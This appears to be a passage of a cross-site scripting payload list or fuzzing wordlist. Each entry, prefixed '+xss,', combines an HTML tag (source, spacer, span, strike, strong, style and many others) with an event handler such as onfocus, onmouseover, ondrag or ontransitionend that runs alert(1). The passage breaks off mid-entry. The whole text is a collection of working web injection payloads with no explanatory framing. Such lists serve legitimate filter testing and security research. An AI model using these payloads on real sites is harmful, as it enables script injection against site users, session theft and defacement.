+xss,'<source id=x tabindex=1 onbeforeactivate=alert(1)></source>' +xss,'<source id=x tabindex=1 onbeforedeactivate=alert(1)></source><input autofocus>' +xss,'<source id=x tabindex=1 ondeactivate=alert(1)></source><input id=y autofocus>' +xss,'<source id=x tabindex=1 onfocus=alert(1)></source>' +xss,'<source id=x tabindex=1 onfocusin=alert(1)></source>' +xss,'<source onbeforecopy="alert(1)" contenteditable>test</source>' +xss,'<source onbeforecut="alert(1)" contenteditable>test</source>' +xss,'<source onbeforepaste="alert(1)" contenteditable>test</source>' +xss,'<source onblur=alert(1) tabindex=1 id=x></source><input autofocus>' +xss,'<source onclick="alert(1)">test</source>' +xss,'<source oncontextmenu="alert(1)">test</source>' +xss,'<source oncopy="alert(1)" contenteditable>test</source>' +xss,'<source oncut="alert(1)" contenteditable>test</source>' +xss,'<source ondblclick="alert(1)">test</source>' +xss,'<source onfocusout=alert(1) tabindex=1 id=x></source><input autofocus>' +xss,'<source onkeydown="alert(1)" contenteditable>test</source>' +xss,'<source onkeypress="alert(1)" contenteditable>test</source>' +xss,'<source onkeyup="alert(1)" contenteditable>test</source>' +xss,'<source onmousedown="alert(1)">test</source>' +xss,'<source onmouseenter="alert(1)">test</source>' +xss,'<source onmouseleave="alert(1)">test</source>' +xss,'<source onmousemove="alert(1)">test</source>' +xss,'<source onmouseout="alert(1)">test</source>' +xss,'<source onmouseover="alert(1)">test</source>' +xss,'<source onmouseup="alert(1)">test</source>' +xss,'<source onpaste="alert(1)" contenteditable>test</source>' +xss,'<spacer draggable="true" ondrag="alert(1)">test</spacer>' +xss,'<spacer draggable="true" ondragend="alert(1)">test</spacer>' +xss,'<spacer draggable="true" ondragenter="alert(1)">test</spacer>' +xss,'<spacer draggable="true" ondragleave="alert(1)">test</spacer>' +xss,'<spacer draggable="true" ondragstart="alert(1)">test</spacer>' +xss,'<spacer id=x tabindex=1 onactivate=alert(1)></spacer>' +xss,'<spacer id=x tabindex=1 onbeforeactivate=alert(1)></spacer>' +xss,'<spacer id=x tabindex=1 onbeforedeactivate=alert(1)></spacer><input autofocus>' +xss,'<spacer id=x tabindex=1 ondeactivate=alert(1)></spacer><input id=y autofocus>' +xss,'<spacer id=x tabindex=1 onfocus=alert(1)></spacer>' +xss,'<spacer id=x tabindex=1 onfocusin=alert(1)></spacer>' +xss,'<spacer onbeforecopy="alert(1)" contenteditable>test</spacer>' +xss,'<spacer onbeforecut="alert(1)" contenteditable>test</spacer>' +xss,'<spacer onbeforepaste="alert(1)" contenteditable>test</spacer>' +xss,'<spacer onblur=alert(1) tabindex=1 id=x></spacer><input autofocus>' +xss,'<spacer onclick="alert(1)">test</spacer>' +xss,'<spacer oncontextmenu="alert(1)">test</spacer>' +xss,'<spacer oncopy="alert(1)" contenteditable>test</spacer>' +xss,'<spacer oncut="alert(1)" contenteditable>test</spacer>' +xss,'<spacer ondblclick="alert(1)">test</spacer>' +xss,'<spacer onfocusout=alert(1) tabindex=1 id=x></spacer><input autofocus>' +xss,'<spacer onkeydown="alert(1)" contenteditable>test</spacer>' +xss,'<spacer onkeypress="alert(1)" contenteditable>test</spacer>' +xss,'<spacer onkeyup="alert(1)" contenteditable>test</spacer>' +xss,'<spacer onmousedown="alert(1)">test</spacer>' +xss,'<spacer onmouseenter="alert(1)">test</spacer>' +xss,'<spacer onmouseleave="alert(1)">test</spacer>' +xss,'<spacer onmousemove="alert(1)">test</spacer>' +xss,'<spacer onmouseout="alert(1)">test</spacer>' +xss,'<spacer onmouseover="alert(1)">test</spacer>' +xss,'<spacer onmouseup="alert(1)">test</spacer>' +xss,'<spacer onpaste="alert(1)" contenteditable>test</spacer>' +xss,'<span draggable="true" ondrag="alert(1)">test</span>' +xss,'<span draggable="true" ondragend="alert(1)">test</span>' +xss,'<span draggable="true" ondragenter="alert(1)">test</span>' +xss,'<span draggable="true" ondragleave="alert(1)">test</span>' +xss,'<span draggable="true" ondragstart="alert(1)">test</span>' +xss,'<span id=x tabindex=1 onactivate=alert(1)></span>' +xss,'<span id=x tabindex=1 onbeforeactivate=alert(1)></span>' +xss,'<span id=x tabindex=1 onbeforedeactivate=alert(1)></span><input autofocus>' +xss,'<span id=x tabindex=1 ondeactivate=alert(1)></span><input id=y autofocus>' +xss,'<span id=x tabindex=1 onfocus=alert(1)></span>' +xss,'<span id=x tabindex=1 onfocusin=alert(1)></span>' +xss,'<span onbeforecopy="alert(1)" contenteditable>test</span>' +xss,'<span onbeforecut="alert(1)" contenteditable>test</span>' +xss,'<span onbeforepaste="alert(1)" contenteditable>test</span>' +xss,'<span onblur=alert(1) tabindex=1 id=x></span><input autofocus>' +xss,'<span onclick="alert(1)">test</span>' +xss,'<span oncontextmenu="alert(1)">test</span>' +xss,'<span oncopy="alert(1)" contenteditable>test</span>' +xss,'<span oncut="alert(1)" contenteditable>test</span>' +xss,'<span ondblclick="alert(1)">test</span>' +xss,'<span onfocusout=alert(1) tabindex=1 id=x></span><input autofocus>' +xss,'<span onkeydown="alert(1)" contenteditable>test</span>' +xss,'<span onkeypress="alert(1)" contenteditable>test</span>' +xss,'<span onkeyup="alert(1)" contenteditable>test</span>' +xss,'<span onmousedown="alert(1)">test</span>' +xss,'<span onmouseenter="alert(1)">test</span>' +xss,'<span onmouseleave="alert(1)">test</span>' +xss,'<span onmousemove="alert(1)">test</span>' +xss,'<span onmouseout="alert(1)">test</span>' +xss,'<span onmouseover="alert(1)">test</span>' +xss,'<span onmouseup="alert(1)">test</span>' +xss,'<span onpaste="alert(1)" contenteditable>test</span>' +xss,'<strike draggable="true" ondrag="alert(1)">test</strike>' +xss,'<strike draggable="true" ondragend="alert(1)">test</strike>' +xss,'<strike draggable="true" ondragenter="alert(1)">test</strike>' +xss,'<strike draggable="true" ondragleave="alert(1)">test</strike>' +xss,'<strike draggable="true" ondragstart="alert(1)">test</strike>' +xss,'<strike id=x tabindex=1 onactivate=alert(1)></strike>' +xss,'<strike id=x tabindex=1 onbeforeactivate=alert(1)></strike>' +xss,'<strike id=x tabindex=1 onbeforedeactivate=alert(1)></strike><input autofocus>' +xss,'<strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus>' +xss,'<strike id=x tabindex=1 onfocus=alert(1)></strike>' +xss,'<strike id=x tabindex=1 onfocusin=alert(1)></strike>' +xss,'<strike onbeforecopy="alert(1)" contenteditable>test</strike>' +xss,'<strike onbeforecut="alert(1)" contenteditable>test</strike>' +xss,'<strike onbeforepaste="alert(1)" contenteditable>test</strike>' +xss,'<strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus>' +xss,'<strike onclick="alert(1)">test</strike>' +xss,'<strike oncontextmenu="alert(1)">test</strike>' +xss,'<strike oncopy="alert(1)" contenteditable>test</strike>' +xss,'<strike oncut="alert(1)" contenteditable>test</strike>' +xss,'<strike ondblclick="alert(1)">test</strike>' +xss,'<strike onfocusout=alert(1) tabindex=1 id=x></strike><input autofocus>' +xss,'<strike onkeydown="alert(1)" contenteditable>test</strike>' +xss,'<strike onkeypress="alert(1)" contenteditable>test</strike>' +xss,'<strike onkeyup="alert(1)" contenteditable>test</strike>' +xss,'<strike onmousedown="alert(1)">test</strike>' +xss,'<strike onmouseenter="alert(1)">test</strike>' +xss,'<strike onmouseleave="alert(1)">test</strike>' +xss,'<strike onmousemove="alert(1)">test</strike>' +xss,'<strike onmouseout="alert(1)">test</strike>' +xss,'<strike onmouseover="alert(1)">test</strike>' +xss,'<strike onmouseup="alert(1)">test</strike>' +xss,'<strike onpaste="alert(1)" contenteditable>test</strike>' +xss,'<strong draggable="true" ondrag="alert(1)">test</strong>' +xss,'<strong draggable="true" ondragend="alert(1)">test</strong>' +xss,'<strong draggable="true" ondragenter="alert(1)">test</strong>' +xss,'<strong draggable="true" ondragleave="alert(1)">test</strong>' +xss,'<strong draggable="true" ondragstart="alert(1)">test</strong>' +xss,'<strong id=x tabindex=1 onactivate=alert(1)></strong>' +xss,'<strong id=x tabindex=1 onbeforeactivate=alert(1)></strong>' +xss,'<strong id=x tabindex=1 onbeforedeactivate=alert(1)></strong><input autofocus>' +xss,'<strong id=x tabindex=1 ondeactivate=alert(1)></strong><input id=y autofocus>' +xss,'<strong id=x tabindex=1 onfocus=alert(1)></strong>' +xss,'<strong id=x tabindex=1 onfocusin=alert(1)></strong>' +xss,'<strong onbeforecopy="alert(1)" contenteditable>test</strong>' +xss,'<strong onbeforecut="alert(1)" contenteditable>test</strong>' +xss,'<strong onbeforepaste="alert(1)" contenteditable>test</strong>' +xss,'<strong onblur=alert(1) tabindex=1 id=x></strong><input autofocus>' +xss,'<strong onclick="alert(1)">test</strong>' +xss,'<strong oncontextmenu="alert(1)">test</strong>' +xss,'<strong oncopy="alert(1)" contenteditable>test</strong>' +xss,'<strong oncut="alert(1)" contenteditable>test</strong>' +xss,'<strong ondblclick="alert(1)">test</strong>' +xss,'<strong onfocusout=alert(1) tabindex=1 id=x></strong><input autofocus>' +xss,'<strong onkeydown="alert(1)" contenteditable>test</strong>' +xss,'<strong onkeypress="alert(1)" contenteditable>test</strong>' +xss,'<strong onkeyup="alert(1)" contenteditable>test</strong>' +xss,'<strong onmousedown="alert(1)">test</strong>' +xss,'<strong onmouseenter="alert(1)">test</strong>' +xss,'<strong onmouseleave="alert(1)">test</strong>' +xss,'<strong onmousemove="alert(1)">test</strong>' +xss,'<strong onmouseout="alert(1)">test</strong>' +xss,'<strong onmouseover="alert(1)">test</strong>' +xss,'<strong onmouseup="alert(1)">test</strong>' +xss,'<strong onpaste="alert(1)" contenteditable>test</strong>' +xss,'<style draggable="true" ondrag="alert(1)">test</style>' +xss,'<style draggable="true" ondragend="alert(1)">test</style>' +xss,'<style draggable="true" ondragenter="alert(1)">test</style>' +xss,'<style draggable="true" ondragleave="alert(1)">test</style>' +xss,'<style draggable="true" ondragstart="alert(1)">test</style>' +xss,'<style id=x tabindex=1 onactivate=alert(1)></style>' +xss,'<style id=x tabindex=1 onbeforeactivate=alert(1)></style>' +xss,'<style id=x tabindex=1 onbeforedeactivate=alert(1)></style><input autofocus>' +xss,'<style id=x tabindex=1 ondeactivate=alert(1)></style><input id=y autofocus>' +xss,'<style id=x tabindex=1 onfocus=alert(1)></style>' +xss,'<style id=x tabindex=1 onfocusin=alert(1)></style>' +xss,'<style onbeforecopy="alert(1)" contenteditable>test</style>' +xss,'<style onbeforecut="alert(1)" contenteditable>test</style>' +xss,'<style onbeforepaste="alert(1)" contenteditable>test</style>' +xss,'<style onblur=alert(1) tabindex=1 id=x></style><input autofocus>' +xss,'<style onclick="alert(1)">test</style>' +xss,'<style oncontextmenu="alert(1)">test</style>' +xss,'<style oncopy="alert(1)" contenteditable>test</style>' +xss,'<style oncut="alert(1)" contenteditable>test</style>' +xss,'<style ondblclick="alert(1)">test</style>' +xss,'<style onfocusout=alert(1) tabindex=1 id=x></style><input autofocus>' +xss,'<style onkeydown="alert(1)" contenteditable>test</style>' +xss,'<style onkeypress="alert(1)" contenteditable>test</style>' +xss,'<style onkeyup="alert(1)" contenteditable>test</style>' +xss,'<style onload=alert(1)></style>' +xss,'<style onmousedown="alert(1)">test</style>' +xss,'<style onmouseenter="alert(1)">test</style>' +xss,'<style onmouseleave="alert(1)">test</style>' +xss,'<style onmousemove="alert(1)">test</style>' +xss,'<style onmouseout="alert(1)">test</style>' +xss,'<style onmouseover="alert(1)">test</style>' +xss,'<style onmouseup="alert(1)">test</style>' +xss,'<style onpaste="alert(1)" contenteditable>test</style>' +xss,'<style onreadystatechange=alert(1)></style>' +xss,'<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a>' +xss,'<style>:target {color: red;}</style><abbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></abbr>' +xss,'<style>:target {color: red;}</style><acronym id=x style="transition:color 10s" ontransitioncancel=alert(1)></acronym>' +xss,'<style>:target {color: red;}</style><address id=x style="transition:color 10s" ontransitioncancel=alert(1)></address>' +xss,'<style>:target {color: red;}</style><applet id=x style="transition:color 10s" ontransitioncancel=alert(1)></applet>' +xss,'<style>:target {color: red;}</style><area id=x style="transition:color 10s" ontransitioncancel=alert(1)></area>' +xss,'<style>:target {color: red;}</style><article id=x style="transition:color 10s" ontransitioncancel=alert(1)></article>' +xss,'<style>:target {color: red;}</style><aside id=x style="transition:color 10s" ontransitioncancel=alert(1)></aside>' +xss,'<style>:target {color: red;}</style><audio id=x style="transition:color 10s" ontransitioncancel=alert(1)></audio>' +xss,'<style>:target {color: red;}</style><b id=x style="transition:color 10s" ontransitioncancel=alert(1)></b>' +xss,'<style>:target {color: red;}</style><base id=x style="transition:color 10s" ontransitioncancel=alert(1)></base>' +xss,'<style>:target {color: red;}</style><basefont id=x style="transition:color 10s" ontransitioncancel=alert(1)></basefont>' +xss,'<style>:target {color: red;}</style><bdi id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdi>' +xss,'<style>:target {color: red;}</style><bdo id=x style="transition:color 10s" ontransitioncancel=alert(1)></bdo>' +xss,'<style>:target {color: red;}</style><bgsound id=x style="transition:color 10s" ontransitioncancel=alert(1)></bgsound>' +xss,'<style>:target {color: red;}</style><big id=x style="transition:color 10s" ontransitioncancel=alert(1)></big>' +xss,'<style>:target {color: red;}</style><blink id=x style="transition:color 10s" ontransitioncancel=alert(1)></blink>' +xss,'<style>:target {color: red;}</style><blockquote id=x style="transition:color 10s" ontransitioncancel=alert(1)></blockquote>' +xss,'<style>:target {color: red;}</style><body id=x style="transition:color 10s" ontransitioncancel=alert(1)></body>' +xss,'<style>:target {color: red;}</style><br id=x style="transition:color 10s" ontransitioncancel=alert(1)></br>' +xss,'<style>:target {color: red;}</style><button id=x style="transition:color 10s" ontransitioncancel=alert(1)></button>' +xss,'<style>:target {color: red;}</style><canvas id=x style="transition:color 10s" ontransitioncancel=alert(1)></canvas>' +xss,'<style>:target {color: red;}</style><caption id=x style="transition:color 10s" ontransitioncancel=alert(1)></caption>' +xss,'<style>:target {color: red;}</style><center id=x style="transition:color 10s" ontransitioncancel=alert(1)></center>' +xss,'<style>:target {color: red;}</style><cite id=x style="transition:color 10s" ontransitioncancel=alert(1)></cite>' +xss,'<style>:target {color: red;}</style><code id=x style="transition:color 10s" ontransitioncancel=alert(1)></code>' +xss,'<style>:target {color: red;}</style><col id=x style="transition:color 10s" ontransitioncancel=alert(1)></col>' +xss,'<style>:target {color: red;}</style><colgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></colgroup>' +xss,'<style>:target {color: red;}</style><command id=x style="transition:color 10s" ontransitioncancel=alert(1)></command>' +xss,'<style>:target {color: red;}</style><content id=x style="transition:color 10s" ontransitioncancel=alert(1)></content>' +xss,'<style>:target {color: red;}</style><data id=x style="transition:color 10s" ontransitioncancel=alert(1)></data>' +xss,'<style>:target {color: red;}</style><datalist id=x style="transition:color 10s" ontransitioncancel=alert(1)></datalist>' +xss,'<style>:target {color: red;}</style><dd id=x style="transition:color 10s" ontransitioncancel=alert(1)></dd>' +xss,'<style>:target {color: red;}</style><del id=x style="transition:color 10s" ontransitioncancel=alert(1)></del>' +xss,'<style>:target {color: red;}</style><details id=x style="transition:color 10s" ontransitioncancel=alert(1)></details>' +xss,'<style>:target {color: red;}</style><dfn id=x style="transition:color 10s" ontransitioncancel=alert(1)></dfn>' +xss,'<style>:target {color: red;}</style><dialog id=x style="transition:color 10s" ontransitioncancel=alert(1)></dialog>' +xss,'<style>:target {color: red;}</style><dir id=x style="transition:color 10s" ontransitioncancel=alert(1)></dir>' +xss,'<style>:target {color: red;}</style><div id=x style="transition:color 10s" ontransitioncancel=alert(1)></div>' +xss,'<style>:target {color: red;}</style><dl id=x style="transition:color 10s" ontransitioncancel=alert(1)></dl>' +xss,'<style>:target {color: red;}</style><dt id=x style="transition:color 10s" ontransitioncancel=alert(1)></dt>' +xss,'<style>:target {color: red;}</style><element id=x style="transition:color 10s" ontransitioncancel=alert(1)></element>' +xss,'<style>:target {color: red;}</style><em id=x style="transition:color 10s" ontransitioncancel=alert(1)></em>' +xss,'<style>:target {color: red;}</style><embed id=x style="transition:color 10s" ontransitioncancel=alert(1)></embed>' +xss,'<style>:target {color: red;}</style><fieldset id=x style="transition:color 10s" ontransitioncancel=alert(1)></fieldset>' +xss,'<style>:target {color: red;}</style><figcaption id=x style="transition:color 10s" ontransitioncancel=alert(1)></figcaption>' +xss,'<style>:target {color: red;}</style><figure id=x style="transition:color 10s" ontransitioncancel=alert(1)></figure>' +xss,'<style>:target {color: red;}</style><font id=x style="transition:color 10s" ontransitioncancel=alert(1)></font>' +xss,'<style>:target {color: red;}</style><footer id=x style="transition:color 10s" ontransitioncancel=alert(1)></footer>' +xss,'<style>:target {color: red;}</style><form id=x style="transition:color 10s" ontransitioncancel=alert(1)></form>' +xss,'<style>:target {color: red;}</style><frame id=x style="transition:color 10s" ontransitioncancel=alert(1)></frame>' +xss,'<style>:target {color: red;}</style><frameset id=x style="transition:color 10s" ontransitioncancel=alert(1)></frameset>' +xss,'<style>:target {color: red;}</style><h1 id=x style="transition:color 10s" ontransitioncancel=alert(1)></h1>' +xss,'<style>:target {color: red;}</style><head id=x style="transition:color 10s" ontransitioncancel=alert(1)></head>' +xss,'<style>:target {color: red;}</style><header id=x style="transition:color 10s" ontransitioncancel=alert(1)></header>' +xss,'<style>:target {color: red;}</style><hgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></hgroup>' +xss,'<style>:target {color: red;}</style><hr id=x style="transition:color 10s" ontransitioncancel=alert(1)></hr>' +xss,'<style>:target {color: red;}</style><html id=x style="transition:color 10s" ontransitioncancel=alert(1)></html>' +xss,'<style>:target {color: red;}</style><i id=x style="transition:color 10s" ontransitioncancel=alert(1)></i>' +xss,'<style>:target {color: red;}</style><iframe id=x style="transition:color 10s" ontransitioncancel=alert(1)></iframe>' +xss,'<style>:target {color: red;}</style><image id=x style="transition:color 10s" ontransitioncancel=alert(1)></image>' +xss,'<style>:target {color: red;}</style><img id=x style="transition:color 10s" ontransitioncancel=alert(1)></img>' +xss,'<style>:target {color: red;}</style><input id=x style="transition:color 10s" ontransitioncancel=alert(1)></input>' +xss,'<style>:target {color: red;}</style><ins id=x style="transition:color 10s" ontransitioncancel=alert(1)></ins>' +xss,'<style>:target {color: red;}</style><isindex id=x style="transition:color 10s" ontransitioncancel=alert(1)></isindex>' +xss,'<style>:target {color: red;}</style><kbd id=x style="transition:color 10s" ontransitioncancel=alert(1)></kbd>' +xss,'<style>:target {color: red;}</style><keygen id=x style="transition:color 10s" ontransitioncancel=alert(1)></keygen>' +xss,'<style>:target {color: red;}</style><label id=x style="transition:color 10s" ontransitioncancel=alert(1)></label>' +xss,'<style>:target {color: red;}</style><legend id=x style="transition:color 10s" ontransitioncancel=alert(1)></legend>' +xss,'<style>:target {color: red;}</style><li id=x style="transition:color 10s" ontransitioncancel=alert(1)></li>' +xss,'<style>:target {color: red;}</style><link id=x style="transition:color 10s" ontransitioncancel=alert(1)></link>' +xss,'<style>:target {color: red;}</style><listing id=x style="transition:color 10s" ontransitioncancel=alert(1)></listing>' +xss,'<style>:target {color: red;}</style><main id=x style="transition:color 10s" ontransitioncancel=alert(1)></main>' +xss,'<style>:target {color: red;}</style><map id=x style="transition:color 10s" ontransitioncancel=alert(1)></map>' +xss,'<style>:target {color: red;}</style><mark id=x style="transition:color 10s" ontransitioncancel=alert(1)></mark>' +xss,'<style>:target {color: red;}</style><marquee id=x style="transition:color 10s" ontransitioncancel=alert(1)></marquee>' +xss,'<style>:target {color: red;}</style><menu id=x style="transition:color 10s" ontransitioncancel=alert(1)></menu>' +xss,'<style>:target {color: red;}</style><menuitem id=x style="transition:color 10s" ontransitioncancel=alert(1)></menuitem>' +xss,'<style>:target {color: red;}</style><meta id=x style="transition:color 10s" ontransitioncancel=alert(1)></meta>' +xss,'<style>:target {color: red;}</style><meter id=x style="transition:color 10s" ontransitioncancel=alert(1)></meter>' +xss,'<style>:target {color: red;}</style><multicol id=x style="transition:color 10s" ontransitioncancel=alert(1)></multicol>' +xss,'<style>:target {color: red;}</style><nav id=x style="transition:color 10s" ontransitioncancel=alert(1)></nav>' +xss,'<style>:target {color: red;}</style><nextid id=x style="transition:color 10s" ontransitioncancel=alert(1)></nextid>' +xss,'<style>:target {color: red;}</style><nobr id=x style="transition:color 10s" ontransitioncancel=alert(1)></nobr>' +xss,'<style>:target {color: red;}</style><noembed id=x style="transition:color 10s" ontransitioncancel=alert(1)></noembed>' +xss,'<style>:target {color: red;}</style><noframes id=x style="transition:color 10s" ontransitioncancel=alert(1)></noframes>' +xss,'<style>:target {color: red;}</style><noscript id=x style="transition:color 10s" ontransitioncancel=alert(1)></noscript>' +xss,'<style>:target {color: red;}</style><object id=x style="transition:color 10s" ontransitioncancel=alert(1)></object>' +xss,'<style>:target {color: red;}</style><ol id=x style="transition:color 10s" ontransitioncancel=alert(1)></ol>' +xss,'<style>:target {color: red;}</style><optgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)></optgroup>' +xss,'<style>:target {color: red;}</style><option id=x style="transition:color 10s" ontransitioncancel=alert(1)></option>' +xss,'<style>:target {color: red;}</style><output id=x style="transition:color 10s" ontransitioncancel=alert(1)></output>' +xss,'<style>:target {color: red;}</style><p id=x style="transition:color 10s" ontransitioncancel=alert(1)></p>' +xss,'<style>:target {color: red;}</style><param id=x style="transition:color 10s" ontransitioncancel=alert(1)></param>' +xss,'<style>:target {color: red;}</style><picture id=x style="transition:color 10s" ontransitioncancel=alert(1)></picture>' +xss,'<style>:target {color: red;}</style><plaintext id=x style="transition:color 10s" ontransitioncancel=alert(1)></plaintext>' +xss,'<style>:target {color: red;}</style><pre id=x style="transition:color 10s" ontransitioncancel=alert(1)></pre>' +xss,'<style>:target {color: red;}</style><progress id=x style="transition:color 10s" ontransitioncancel=alert(1)></progress>' +xss,'<style>:target {color: red;}</style><q id=x style="transition:color 10s" ontransitioncancel=alert(1)></q>' +xss,'<style>:target {color: red;}</style><rb id=x style="transition:color 10s" ontransitioncancel=alert(1)></rb>' +xss,'<style>:target {color: red;}</style><rp id=x style="transition:color 10s" ontransitioncancel=alert(1)></rp>' +xss,'<style>:target {color: red;}</style><rt id=x style="transition:color 10s" ontransitioncancel=alert(1)></rt>' +xss,'<style>:target {color: red;}</style><rtc id=x style="transition:color 10s" ontransitioncancel=alert(1)></rtc>' +xss,'<style>:target {color: red;}</style><ruby id=x style="transition:color 10s" ontransitioncancel=alert(1)></ruby>' +xss,'<style>:target {color: red;}</style><s id=x style="transition:color 10s" ontransitioncancel=alert(1)></s>' +xss,'<style>:target {color: red;}</style><samp id=x style="transition:color 10s" ontransitioncancel=alert(1)></samp>' +xss,'<style>:target {color: red;}</style><script id=x style="transition:color 10s" ontransitioncancel=alert(1)></script>' +xss,'<style>:target {color: red;}</style><section id=x style="transition:color 10s" ontransitioncancel=alert(1)></section>' +xss,'<style>:target {color: red;}</style><select id=x style="transition:color 10s" ontransitioncancel=alert(1)></select>' +xss,'<style>:target {color: red;}</style><shadow id=x style="transition:color 10s" ontransitioncancel=alert(1)></shadow>' +xss,'<style>:target {color: red;}</style><slot id=x style="transition:color 10s" ontransitioncancel=alert(1)></slot>' +xss,'<style>:target {color: red;}</style><small id=x style="transition:color 10s" ontransitioncancel=alert(1)></small>' +xss,'<style>:target {color: red;}</style><source id=x style="transition:color 10s" ontransitioncancel=alert(1)></source>' +xss,'<style>:target {color: red;}</style><spacer id=x style="transition:color 10s" ontransitioncancel=alert(1)></spacer>' +xss,'<style>:target {color: red;}</style><span id=x style="transition:color 10s" ontransitioncancel=alert(1)></span>' +xss,'<style>:target {color: red;}</style><strike id=x style="transition:color 10s" ontransitioncancel=alert(1)></strike>' +xss,'<style>:target {color: red;}</style><strong id=x style="transition:color 10s" ontransitioncancel=alert(1)></strong>' +xss,'<style>:target {color: red;}</style><style id=x style="transition:color 10s" ontransitioncancel=alert(1)></style>' +xss,'<style>:target {color: red;}</style><sub id=x style="transition:color 10s" ontransitioncancel=alert(1)></sub>' +xss,'<style>:target {color: red;}</style><summary id=x style="transition:color 10s" ontransitioncancel=alert(1)></summary>' +xss,'<style>:target {color: red;}</style><sup id=x style="transition:color 10s" ontransitioncancel=alert(1)></sup>' +xss,'<style>:target {color: red;}</style><svg id=x style="transition:color 10s" ontransitioncancel=alert(1)></svg>' +xss,'<style>:target {color: red;}</style><table id=x style="transition:color 10s" ontransitioncancel=alert(1)></table>' +xss,'<style>:target {color: red;}</style><tbody id=x style="transition:color 10s" ontransitioncancel=alert(1)></tbody>' +xss,'<style>:target {color: red;}</style><td id=x style="transition:color 10s" ontransitioncancel=alert(1)></td>' +xss,'<style>:target {color: red;}</style><template id=x style="transition:color 10s" ontransitioncancel=alert(1)></template>' +xss,'<style>:target {color: red;}</style><textarea id=x style="transition:color 10s" ontransitioncancel=alert(1)></textarea>' +xss,'<style>:target {color: red;}</style><tfoot id=x style="transition:color 10s" ontransitioncancel=alert(1)></tfoot>' +xss,'<style>:target {color: red;}</style><th id=x style="transition:color 10s" ontransitioncancel=alert(1)></th>' +xss,'<style>:target {color: red;}</style><thead id=x style="transition:color 10s" ontransitioncancel=alert(1)></thead>' +xss,'<style>:target {color: red;}</style><time id=x style="transition:color 10s" ontransitioncancel=alert(1)></time>' +xss,'<style>:target {color: red;}</style><title id=x style="transition:color 10s" ontransitioncancel=alert(1)></title>' +xss,'<style>:target {color: red;}</style><tr id=x style="transition:color 10s" ontransitioncancel=alert(1)></tr>' +xss,'<style>:target {color: red;}</style><track id=x style="transition:color 10s" ontransitioncancel=alert(1)></track>' +xss,'<style>:target {color: red;}</style><tt id=x style="transition:color 10s" ontransitioncancel=alert(1)></tt>' +xss,'<style>:target {color: red;}</style><u id=x style="transition:color 10s" ontransitioncancel=alert(1)></u>' +xss,'<style>:target {color: red;}</style><ul id=x style="transition:color 10s" ontransitioncancel=alert(1)></ul>' +xss,'<style>:target {color: red;}</style><var id=x style="transition:color 10s" ontransitioncancel=alert(1)></var>' +xss,'<style>:target {color: red;}</style><video id=x style="transition:color 10s" ontransitioncancel=alert(1)></video>' +xss,'<style>:target {color: red;}</style><wbr id=x style="transition:color 10s" ontransitioncancel=alert(1)></wbr>' +xss,'<style>:target {color: red;}</style><xmp id=x style="transition:color 10s" ontransitioncancel=alert(1)></xmp>' +xss,'<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a>' +xss,'<style>:target {color:red;}</style><abbr id=x style="transition:color 1s" ontransitionend=alert(1)></abbr>' +xss,'<style>:target {color:red;}</style><acronym id=x style="transition:color 1s" ontransitionend=alert(1)></acronym>' +xss,'<style>:target {color:red;}</style><address id=x style="transition:color 1s" ontransitionend=alert(1)></address>' +xss,'<style>:target {color:red;}</style><applet id=x style="transition:color 1s" ontransitionend=alert(1)></applet>' +xss,'<style>:target {color:red;}</style><area id=x style="transition:color 1s" ontransitionend=alert(1)></area>' +xss,'<style>:target {color:red;}</style><article id=x style="transition:color 1s" ontransitionend=alert(1)></article>' +xss,'<style>:target {color:red;}</style><aside id=x style="transition:color 1s" ontransitionend=alert(1)></aside>' +xss,'<style>:target {color:red;}</style><audio id=x style="transition:color 1s" ontransitionend=alert(1)></audio>' +xss,'<style>:target {color:red;}</style><b id=x style="transition:color 1s" ontransitionend=alert(1)></b>' +xss,'<style>:target {color:red;}</style><base id=x style="transition:color 1s" ontransitionend=alert(1)></base>' +xss,'<style>:target {color:red;}</style><basefont id=x style="transition:color 1s" ontransitionend=alert(1)></basefont>' +xss,'<style>:target {color:red;}</style><bdi id=x style="transition:color 1s" ontransitionend=alert(1)></bdi>' +xss,'<style>:target {color:red;}</style><bdo id=x style="transition:color 1s" ontransitionend=alert(1)></bdo>' +xss,'<style>:target {color:red;}</style><bgsound id=x style="transition:color 1s" ontransitionend=alert(1)></bgsound>' +xss,'<style>:target {color:red;}</style><big id=x style="transition:color 1s" ontransitionend=alert(1)></big>' +xss,'<style>:target {color:red;}</style><blink id=x style="transition:color 1s" ontransitionend=alert(1)></blink>' +xss,'<style>:target {color:red;}</style><blockquote id=x style="transition:color 1s" ontransitionend=alert(1)></blockquote>' +xss,'<style>:target {color:red;}</style><body id=x style="transition:color 1s" ontransitionend=alert(1)></body>' +xss,'<style>:target {color:red;}</style><br id=x style="transition:color 1s" ontransitionend=alert(1)></br>' +xss,'<style>:target {color:red;}</style><button id=x style="transition:color 1s" ontransitionend=alert(1)></button>' +xss,'<style>:target {color:red;}</style><canvas id=x style="transition:color 1s" ontransitionend=alert(1)></canvas>' +xss,'<style>:target {color:red;}</style><caption id=x style="transition:color 1s" ontransitionend=alert(1)></caption>' +xss,'<style>:target {color:red;}</style><center id=x style="transition:color 1s" ontransitionend=alert(1)></center>' +xss,'<style>:target {color:red;}</style><cite id=x style="transition:color 1s" ontransitionend=alert(1)></cite>' +xss,'<style>:target {color:red;}</style><code id=x style="transition:color 1s" ontransitionend=alert(1)></code>' +xss,'<style>:target {color:red;}</style><col id=x style="transition:color 1s" ontransitionend=alert(1)></col>' +xss,'<style>:target {color:red;}</style><colgroup id=x style="transition:color 1s" ontransitionend=alert(1)></colgroup>' +xss,'<style>:target {color:red;}</style><command id=x style="transition:color 1s" ontransitionend=alert(1)></command>' +xss,'<style>:target {color:red;}</style><content id=x style="transition:color 1s" ontransitionend=alert(1)></content>' +xss,'<style>:target {color:red;}</style><data id=x style="transition:color 1s" ontransitionend=alert(1)></data>' +xss,'<style>:target {color:red;}</style><datalist id=x style="transition:color 1s" ontransitionend=alert(1)></datalist>' +xss,'<style>:target {color:red;}</style><dd id=x style="transition:color 1s" ontransitionend=alert(1)></dd>' +xss,'<style>:target {color:red;}</style><del id=x style="transition:color 1s" ontransitionend=alert(1)></del>' +xss,'<style>:target 